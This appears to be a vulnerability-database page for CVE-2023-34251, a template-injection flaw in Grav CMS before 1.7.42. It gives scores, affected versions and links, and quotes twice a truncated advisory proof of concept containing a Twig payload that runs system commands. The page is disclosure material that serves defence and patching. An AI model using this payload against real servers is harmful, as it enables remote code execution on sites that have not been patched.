CVE-2023-34251
published 2023-06-14CVE-2023-34251: Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by…
PriorityP347high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EPSS
2.34%
81.5th percentile
Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgrav | grav | < 1.7.42 | 1.7.42 |
| getgrav | grav | >= 0 < 1.7.42 | 1.7.42 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Grav Server Side Template Injection (SSTI) vulnerability
osv·2023-06-16
CVE-2023-34251 [CRITICAL] Grav Server Side Template Injection (SSTI) vulnerability
Grav Server Side Template Injection (SSTI) vulnerability
### Summary
I found an RCE(Remote Code Execution) by SSTI in the admin screen.
### Details
Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.
### PoC
1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`)
2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.
```js
(async () => {
const nonce = document.querySelector("input[name=admin-nonce]").value;
const id = document.querySelector("input[name=__unique_form_id__]").value;
const payload = "{{['id']|map('system')|join}}";
GHSA
Grav Server Side Template Injection (SSTI) vulnerability
ghsa·2023-06-16
CVE-2023-34251 [CRITICAL] CWE-94 Grav Server Side Template Injection (SSTI) vulnerability
Grav Server Side Template Injection (SSTI) vulnerability
### Summary
I found an RCE(Remote Code Execution) by SSTI in the admin screen.
### Details
Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.
### PoC
1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`)
2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.
```js
(async () => {
const nonce = document.querySelector("input[name=admin-nonce]").value;
const id = document.querySelector("input[name=__unique_form_id__]").value;
const payload = "{{['id']|map('system')|join}}";
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5
2023-06-14
Published